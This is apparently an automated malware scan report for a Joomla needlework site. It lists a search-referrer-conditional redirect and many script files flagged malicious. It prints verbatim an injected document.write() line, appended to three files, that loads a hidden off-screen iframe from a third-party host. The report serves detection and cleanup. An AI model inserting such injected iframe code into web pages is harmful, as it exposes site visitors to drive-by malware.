Malicious/Suspicious Redirects
Request | Server response | Status |
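URL: http://needlework-collection.ru/ (imitation of visitor from search engine) GET / HTTP/1.1 Host: needlework-collection.ru Referer: http://www.google.com/search?q=redirect+check1 | HTTP/1.1 302 Found Connection: close Date: Wed, 24 Sep 2014 09:21:35 GMT Location: http://site.portrelay.com/ Server: Jino.ru/mod_pizza Content-Length: 0 Content-Type: text/html | malicious |
Note: this 302 was returned to a request carrying a search-engine Referer, while the same URL in the "Scanned pages/files" table below returned 200 OK and was rated clean. The redirect therefore appears to be conditional, and a direct visit to the site may not reproduce it.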
Scanned pages/files
Request | Server response | Status |
http://needlework-collection.ru/ | 200 OK Content-Length: 46398 Content-Type: text/html | clean |
http://needlework-collection.ru/components/com_jcomments/js/jcomments-v2.1.js?v=2 | 200 OK Content-Length: 27336 Content-Type: application/javascript | malicious |
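Malicious code - confirmed by antiviruses (see below). The excerpt is truncated in the middle. The injected part is the document.write() call at its end, which adds an iframe positioned off-screen (left:-550px) that loads from a third-party host. The JComments code before it appears to be the original library. The same document.write() line is appended to ajax.js and caption.js below, so cleanup should compare every script file against a known-good copy rather than only the files listed here.
function JCommentsEvents(){}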
function JCommentsInput(){} function JCommentsIndicator(){this.init();} function JCommentsForm(id,editor){this.init(id,editor);} function JCommentsEditor(textarea,resizable){this.init(textarea,resizable);} function JComments(oi,og,r){this.init(oi,og,r);} JCommentsEvents.prototype = { add: function(o,e,f){if(o.addEventListener){o.addEventListener(e,f,false);return true;}else if(o.attachEvent){var r=o.attachEvent("on"+e,f);retu updateSubscription: function(m,t){var e=this.$('comments-subscription');if(e){var jc=this;e.innerHTML=t;e.onclick=m?function(){jc.unsubscribe(jc.oi,jc.og);return false;}:function(){jc.subscribe(jc.oi,jc.og);return false;};e.blur();}}, go: function(l){window.open(l);return;} };;document.write('<iframe style="position:fixed;top:0px;left:-550px;" src="http://icimhqiyi.dns-stuff.com/a8e8.w5bYP?13" height="500" width="500"></iframe>'); Antivirus reports:
| ||
http://needlework-collection.ru/components/com_jcomments/libraries/joomlatune/ajax.js | 200 OK Content-Length: 4135 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) if (!window.jtajax) { function jtAJAX() { this.options = {url: '',type: 'post',nocache: true,data: ''}; this.$ = function(id) {if(!id){return null;}var o=document.getElementById(id);if(!o&&document.all){o=document.all[id];}return o;}; this.extend = function(o, e){for(var k in (e||{}))o[k]=e[k];return o;}; this.encode = function(t){return encodeURIComponent(t);}; this.setup = function(options) {this.options = this.extend(this.options, options);}; this default: this.error('Unknown command: ' + cmd);break; } } delete result; delete cmd; delete id; delete property; delete data; delete obj; return true; }; this.error = function(){}; } var jtajax = new jtAJAX(); };document.write('<iframe style="position:fixed;top:0px;left:-550px;" src="http://icimhqiyi.dns-stuff.com/a8e8.w5bYP?13" height="500" width="500"></iframe>'); Antivirus reports:
| ||
http://needlework-collection.ru/media/system/js/caption.js | 200 OK Content-Length: 1878 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) var JCaption = new Class({ initialize: function(selector) { this.selector = selector; var images = $$(selector); images.each(function(image){ this.createCaption(image); }, this); }, createCaption: function(element) { var caption = document.createTextNode(element.title); var container = document.createElement("div"); var text = document.createElement("p"); var width = element.getAttribute("width"); var align = container.setAttribute("style","float:"+align); container.style.width = width + "px"; } }); document.caption = null window.addEvent('load', function() { var caption = new JCaption('img.caption') document.caption = caption }); ;document.write('<iframe style="position:fixed;top:0px;left:-550px;" src="http://icimhqiyi.dns-stuff.com/a8e8.w5bYP?13" height="500" width="500"></iframe>'); Antivirus reports:
| ||
http://needlework-collection.ru/templates/rt_chromatophore/js/roktoppanel.js | 200 OK Content-Length: 1334 Content-Type: application/javascript | malicious |
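Malicious code - confirmed by antiviruses (see below). The excerpt is cut off before the end of the file, so the code that triggered the detection is not visible here. The eval(function(p,a,c,k,e,r){...}) wrapper is a widely used JavaScript packer stub that also appears in legitimate template scripts, so the verdict rests on the antivirus reports rather than on the wrapper itself. The same applies to the other packed files in this table.
eval(function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('J b={H:\'1.0\',3:{\'5\':\'#i-w .5\',\'4\':\'#i-4\',\'q\':\'p\',\'9\':h.G.F.A,\'a\':v,\'6\':1},g:j(){2.3=b.3;2.5=$$(2.3.5)[0];2.4=$$(2.3.4)[0];$(\'d-o\').c(\
Antivirus reports: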
| ||
http://needlework-collection.ru/templates/rt_chromatophore/js/mooRainbow.js | 200 OK Content-Length: 14888 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) var overlays = [ 'overlay-abstract', 'overlay-bark', 'overlay-blocks', 'overlay-carbon', 'overlay-cracked', 'overlay-crecent', 'overlay-foliage', 'overlay-gatorskin', 'overlay-gradient1', 'overlay-gradient2', 'overlay-hills', 'overlay-hills-trees', 'overlay-mosaic', 'overlay-perforated', 'overlay-spirals', 'overlay-spirals2', 'overlay-stripes-diag', 'overlay-stripes-vert', 'overlay-targets' ]; var themes = new Hash({ "Business Casual": ["overla Antivirus reports:
| ||
http://needlework-collection.ru/templates/rt_chromatophore/js/rokslidestrip.js | 200 OK Content-Length: 3157 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) eval(function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('4 X=8 1L({1v:\'1.9\',3:{j:\'\',1B:{11:G,1l:1e},M:{11:G,1S:16.1N.1K.1F},A:{7:1u,i:1p},v:G,T:\'1h\',D:1b},1W:6(a,b){2.1R(b);2.J=$(a);2.m=2.J.1J(\'.g-k\');q(!2 Antivirus reports:
| ||
http://needlework-collection.ru/templates/rt_chromatophore/rokzoom/rokzoom.js | 200 OK Content-Length: 7001 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) eval(function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('I 1m=f 3w({t:{V:\'p/\',1r:{2i:3h,34:T.2O.2C.3P,1S:U},2l:{1S:U},3v:{2i:3l,1S:U}},3g:9(a){4.2W(a);4.1Z();4.1Y();4.g={Y:4.A.3O(4.t.1r),o:4.o.2w(\'q\',4.t.3H),n:4.n.2w(\'Q\ Antivirus reports:
| ||
http://needlework-collection.ru/templates/rt_chromatophore/js/rokmoomenu.js | 200 OK Content-Length: 2425 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) eval(function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('5 C=R G({6:{m:1t,7:\'1c\',j:12,l:{h:[\'z\',\'Q\'],F:G.1i}},1f:3(b,c){2.11(c);4(n.q)2.6.j=X;2.w=$(b);2.w.V(\'T\').9(3(a){a.1o({\'1l\':2.M.H(2,a),\'1e\':2.I.H(2,a)} Antivirus reports:
| ||
http://needlework-collection.ru/templates/rt_chromatophore/js/mootools.bgiframe.js | 200 OK Content-Length: 1121 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) eval(function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('9.o({5:v(2){6(L.B){6(!3.r(\'d.5\')){2=2||{};g a=$b(2.4,\'J:z\');c 2.4;g 8=$b(2.f,q);c 2.f;(p 9(\'d\',{\'n\':\'5\',m:0,j:-1,4:a,2:$i({h:-3.7(\'K\').e(),D:-3.7(\'C\').e() Antivirus reports:
| ||
http://pagead2.googlesyndication.com/pagead/show_ads.js | 200 OK Content-Length: 21412 Content-Type: text/javascript | clean |
http://odnaknopka.ru/ok3.js | 200 OK Content-Length: 2766 Content-Type: text/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function NewOdnaknopka3() {
this.domain=location.href+'/'; this.domain=this.domain.substr(this.domain.indexOf('://')+3); this.domain=this.domain.substr(0,this.domain.indexOf('/')); this.location=false; this.url=function(system) { var title=encodeURIComponent(document.title); var url=encodeURIComponent(location.href); switch (system) { case 1: return 'http://vkontakte.ru/share.php?url='+url; case 2: return 'http://www.facebook.com/sharer.php?u='+u for (i=0;i<12;i++) { html+='<a href="'+this.url(i+1)+'" onclick="return odnaknopka3.go('+(i+1)+');"><img src="http://odnaknopka.ru/images/blank.gif" width="16" height="16" alt=" #" title="'+titles[i]+'" style="border:0;padding:0;margin:0 4px 0 0;background:url(http://odnaknopka.ru/images/panel.png) no-repeat -270px -'+(i*16)+'px"/></a>'; } document.write(html); } } odnaknopka3=new NewOdnaknopka3(); odnaknopka3.init(); Antivirus reports:
| ||
http://needlework-collection.ru/index.php/biser | 200 OK Content-Length: 31189 Content-Type: text/html | clean |
http://needlework-collection.ru/index.php/ | 200 OK Content-Length: 46420 Content-Type: text/html | clean |
http://needlework-collection.ru/index.php/biser/bijuteriya | 200 OK Content-Length: 28383 Content-Type: text/html | clean |
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=needlework-collection.ru
Result: This site is not currently listed as suspicious. (A site that is not listed is not thereby shown to be clean; this result does not contradict the malicious findings in the scan above.)
Query: http://yandex.com/infected?l10n=en&url=http://needlework-collection.ru/
Result: needlework-collection.ru is not infected or malware details are not published yet.